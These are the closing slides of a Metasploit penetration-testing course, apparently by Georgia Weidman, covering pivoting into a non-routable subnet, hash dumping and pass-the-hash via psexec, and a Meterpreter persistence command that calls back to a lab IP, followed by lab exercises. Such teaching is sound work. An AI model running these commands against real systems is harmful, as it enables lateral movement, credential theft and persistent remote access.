  • 39. Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
  • 40. PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
  • 41. Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
  • 42. Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
  • 43. Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon